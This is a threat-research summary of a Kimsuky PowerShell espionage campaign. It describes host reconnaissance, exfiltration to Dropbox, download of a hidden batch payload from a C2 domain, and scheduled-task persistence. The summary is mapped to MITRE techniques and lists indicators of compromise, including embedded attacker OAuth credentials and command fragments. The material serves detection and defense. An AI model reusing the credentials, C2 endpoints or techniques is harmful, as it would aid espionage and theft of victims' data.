Threat Research

Kimsuky Dropbox Enabled PowerShell Espionage

Securonix
Kimsuky Dropbox Enabled PowerShell Espionage

A malicious PowerShell script named 외교광장.ps1 collects system information from infected PCs, uploads it to Dropbox, obtains an access token, and downloads a secondary payload (po.bat) from Dropbox to execute hidden via cmd.exe. The campaign also fetches additional files from koreadiplomacyplaza.kro.kr to deploy pm.exe, schedule persistence, and appears to target an organization tied to political figures; embedded Dropbox credentials and endpoints are included. #외교광장.ps1 #koreadiplomacyplaza.kro.kr

Keypoints

  • The sample is a PowerShell script (외교광장.ps1, ~1 MB) that collects host data and exfiltrates it to Dropbox using OAuth2 credentials embedded in the script.
  • Collected data includes running processes (Get-Process), OS version, public IP (nslookup myip.opendns.com), and installed antivirus products (Get-CimInstance root/SecurityCenter2 AntivrusProduct), written to C:UsersPublicDocumentstmp.ini.
  • The script requests an access_token from Dropbox (oauth2/token) using embedded client_id, client_secret, and refresh_token, then uploads the info file and attempts to download a secondary payload (/jhb_test.db) to C:UsersPublicMusicpo.bat and execute it hidden via cmd.exe.
  • If the download succeeds, the Dropbox file is moved to a “…_sent” path to indicate success; temporary local files are removed after upload to evade detection.
  • A separate malicious script downloads four files from koreadiplomacyplaza.kro.kr (default0–default3), copies executables and resources to C:UsersPublicVideos, and creates a Scheduled Task (Transt_Feed_Synchronization-{GUID}) for persistence.
  • The downloader uses curl -k to ignore SSL validation and %~dp0 to place files in the current script directory; fetched files include an executable (pm.exe), manifest, PowerShell script (1.ps1), and scheduler XML.
  • Embedded Dropbox credentials in the script include client_id=75mc2yhns7tfcad, client_secret=q4bbqpnc5g2d85l, and a refresh_token beginning with iUPmF…; several Dropbox API endpoints are abused for upload, download, and move operations.

MITRE Techniques

  • [T1083] File and Directory Discovery – The script enumerates local files/paths and writes collected info to C:UsersPublicDocumentstmp.ini (“…these were combined and written to C:UsersPublicDocumentstmp(.)ini…”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Main malicious functionality implemented as a PowerShell script that collects data, calls REST APIs, downloads files, and starts processes (“…malicious PowerShell code … collects information and uploads to Dropbox and downloads a secondary payload (.bat) to execute”).
  • [T1105] Ingress Tool Transfer – Downloads secondary payloads from Dropbox and from koreadiplomacyplaza.kro.kr (default0–default3) to local paths like C:UsersPublicMusicpo.bat and C:UsersPublicVideospm.exe (“…downloaded four files from koreadiplomacyplaza(.)kro(.)kr and saved locally…”).
  • [T1106] Native API – Uses Invoke-RestMethod (PowerShell) to call Dropbox APIs for token exchange, upload, download, and move operations (“…Invoke-RestMethod -Uri hxxps://api.dropboxapi.com/oauth2/token … used to obtain access_token”).
  • [T1078] Valid Accounts – Uses embedded OAuth2 credentials (client_id, client_secret, refresh_token) to obtain Dropbox access tokens and access victim Dropbox storage (“…embedded credentials client_id=75mc2yhns7tfcad client_secret=q4bbqpnc5g2d85l refresh_token=…”).
  • [T1036.005] Masquerade: Match Legitimate Name or Location – Writes files into common public directories (C:UsersPublicDocuments, C:UsersPublicMusic, C:UsersPublicVideos) and uses filenames (po.bat, pm.exe) to blend in (“…copy malicious files to C:UsersPublicVideos and name pm.exe…”).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (via Scheduled Task) – Creates a Scheduled Task named Transt_Feed_Synchronization-{GUID} using downloaded XML to maintain persistence (“…schtasks /create /tn Transt_Feed_Synchronization-{GUID} /xml “%~dp0default3″ … to ensure persistence”).
  • [T1566.001] Phishing: Spearphishing Link (C2) – Uses a domain koreadiplomacyplaza.kro.kr as a command-and-control / file-hosting domain to deliver payloads (“…remote C2 (koreadiplomacyplaza(.)kro(.)kr) from which multiple files are downloaded…”).

Indicators of Compromise

  • [File Hashes] sample metadata – MD5: 8ef331da6a71931c8843488c6d13a1a2, SHA-256: 89a6d3392668ba1b765a5ebcc8ac5045fffe8b6ef431004cba352868424a5cc3
  • [File Names / Paths] local artifacts and payloads – C:UsersPublicDocumentstmp.ini (created then removed), C:UsersPublicMusicpo.bat, C:UsersPublicVideospm.exe
  • [Domains / URLs] C2 and Dropbox endpoints – koreadiplomacyplaza.kro.kr (used to host default0–default3), hxxps://api.dropboxapi.com/oauth2/token, hxxps://content.dropboxapi.com/2/files/upload, hxxps://content.dropboxapi.com/2/files/download
  • [Credentials / Tokens] embedded OAuth2 credentials – client_id=75mc2yhns7tfcad, client_secret=q4bbqpnc5g2d85l, refresh_token=iUPmF(P)0K-HcAAAAAAAAAAUn2al_tpIVg_GqzVKP(m)27Q3IYlYX80OEDrbq7hZIFUB
  • [DNS / Network] public IP discovery service – myip.opendns.com via DNS server 208.67.222.220 (used to obtain victim public IP)

Read more: https://wezard4u.tistory.com/429586

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint